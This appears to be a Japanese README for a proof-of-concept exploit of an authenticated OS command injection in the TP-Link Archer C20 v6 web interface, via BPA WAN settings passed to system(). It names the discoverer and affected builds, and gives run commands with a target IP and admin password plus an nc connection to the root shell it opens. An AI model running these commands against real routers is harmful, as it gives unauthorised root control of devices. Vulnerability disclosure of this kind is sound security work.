
TP-Link Archer C20 v6 Web管理インターフェースにおける認証済みOSコマンドインジェクションの概念実証エクスプロイト。LAN経由でBPA WAN構成を介してrootコマンドを実行します。
TP-Link Archer C20 v6 Web管理インターフェースにおける認証済みOSコマンドインジェクション。
BPA WAN設定値は適切な無害化なしにsystem()に渡されるため、隣接ネットワーク上の認証済み管理者がrootとしてコマンドを実行できる。
Daniil Gordeev (totekuh) によって発見および報告されました。
0.9.1 Build 260811 より前0.9.1 Build 260812 より前0.9.1 Build 260812 より前requests、pycryptodomepython3 -m pip install requests pycryptodome
python3 bpa-poc.py --target 192.168.0.1 --password '<admin-password>'
nc 192.168.0.1 4445
--list-only を使用すると、コマンドインジェクションをトリガーせずに
WANインスタンスを列挙できます。